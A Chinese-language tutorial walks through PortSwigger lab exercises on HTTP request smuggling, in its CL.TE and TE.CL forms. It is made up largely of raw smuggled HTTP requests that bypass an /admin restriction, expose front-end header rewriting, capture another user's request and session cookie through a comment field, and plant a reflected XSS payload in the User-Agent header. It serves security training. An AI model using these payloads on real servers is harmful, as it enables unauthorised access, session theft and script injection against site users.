關於請求走私的介紹可參考
使用走私請求常見的攻擊方式有以下幾種:
- 饒過訪問限制保護
- 揭露請求敏感信息
- 捕獲其他用戶的請求
- 反射XSS攻擊
饒過訪問限制保護
正常訪問/admin時,返回"Path /admin is blocked"
但目標有CL.TE漏洞,因此可使用以下請求攻擊
############# request twice #############
POST / HTTP/1.1
Host: ac631fc51f38e05280923fa5000e0064.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
############# second response #############
...omit...
Admin interface only available if logged in as an administrator, or if requested as localhost
...omit...成功接觸到admin頁面,但只允許localhost訪問,因此要在修改攻擊請求如下
############# request twice #############
POST / HTTP/1.1
Host: ac631fc51f38e05280923fa5000e0064.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: localhost
############# second response #############
you can see admin interface
Lab: Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability
換個例子,如果目標改為TE.CL漏洞,可改用以下請求攻擊
############# request twice #############
POST / HTTP/1.1
Host: acd01ff61f66e0678013454c001d00b6.web-security-academy.net
Content-length: 4
Transfer-Encoding: chunked
87
GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
############# second response #############
you can see admin interfacelab: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability
揭露請求敏感信息
在許多應用程式中,前端伺服器在將請求轉發到後端伺服器之前對請求進行一些重寫,通常是透過添加一些額外的請求標頭
如下,對目標發攻擊後,返回的結果發現X-WwcdiB-Ip: 122.55.108.34
############# request twice #############
POST / HTTP/1.1
Host: ac471f931ebc52d180f32c9e00b300a9.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
Transfer-Encoding: chunked
0
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
Connection: close
search=test
############# second response #############
...omit...
<h1>0 search results for 'testPOST / HTTP/1.1
X-WwcdiB-Ip: 122.55.108.34
Host: ac471f931ebc52d180f32c9e00b300a9.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
Transfer-'</h1>
...omit...由於該目標只限127,0,0.1訪問,因此將攻擊請求改為X-WwcdiB-Ip: 127.0.0.1
############# request twice #############
POST / HTTP/1.1
Host: ac471f931ebc52d180f32c9e00b300a9.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
X-WwcdiB-Ip: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
Connection: close
x=1
############# second response #############
you can see admin interfaceLab: Exploiting HTTP request smuggling to reveal front-end request rewriting
捕獲其他用戶的請求
假如正常發文請求如下
POST /post/comment HTTP/1.1
...omit...
Cookie: session=9iqFDvrsD4YjgDoaR2TicREMpjQYUbNp
csrf=668TCjg6wdAu0ydXM6EAPMWgwX43Q2GA&postId=4&comment=test&name=t&email=t%40gmal.com&website=如果目標有TECL弱點,可發送以下請求
POST / HTTP/1.1
Host: ac8c1f511e1b975f80e47d1000550026.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 277
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 805
Cookie: session=9iqFDvrsD4YjgDoaR2TicREMpjQYUbNp
csrf=668TCjg6wdAu0ydXM6EAPMWgwX43Q2GA&postId=4&name=Carlos+Montoya&email=carlos%40normal-user.net&website=&comment=tttt假如有其他人送出請求訪問網站,如下。就會與剛剛的走私請求合併
GET /post?postId=4
...omit...
Cookie: session=9iqFDvrsD4YjgDoaR2TicREMpjQYUbNp合併後的請求如下,送出後,comment參數附加了其他送出的請求內容,也包含對方的cookie
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 805
Cookie: session=9iqFDvrsD4YjgDoaR2TicREMpjQYUbNp
csrf=668TCjg6wdAu0ydXM6EAPMWgwX43Q2GA&postId=4&name=Carlos+Montoya&email=carlos%40normal-user.net&website=&comment=ttttGET /post?postId=4
...omit...
Cookie: session=9iqFDvrsD4YjgDoaR2TicREMpjQYUbNp這些其他人送出的內容就會根據請求發送到網站上,而comment的內容就會大致如下,成功取得對方cookie
ttttGET /post?postId=4
...omit...
Cookie: session=9iqFDvrsD4YjgDoaR2TicREMpjQYUbNp如果沒有把完整內容貼上去,只合併部份,如下,就代表請求走私攻擊的content-length太小,需要把長度加大才可以容納更多內容
ttttGET /posLab: Exploiting HTTP request smuggling to capture other users’ requests
反射XSS攻擊
假如訪問文章時,返回內容會顯示請求的userAgent,如下
############# request #############
GET /post?postId=5 HTTP/1.1
...omit...
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
...omit...
############# response #############
...omit...
<input required type="hidden" name="userAgent" value="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36">
...omit...如果目標有CLTE漏洞,那可以準備以下走私請求,並在userAgent中加入XSS
############# request twice #############
POST / HTTP/1.1
Host: acab1fb71ede4624806f0baf0038009a.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
Transfer-Encoding: chunked
0
GET /post?postId=5 HTTP/1.1
User-Agent: a"/><script>alert(1)</script>
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
x=1當其他使用者訪問網站送出請求時,就會和剛剛的走請求合併,於是返回內容就會顯示userAgent中的XSS
...omit...
<input required type="hidden" name="userAgent" value="a"/><script>alert(1)</script>">
...omit...Lab: Exploiting HTTP request smuggling to deliver reflected XSS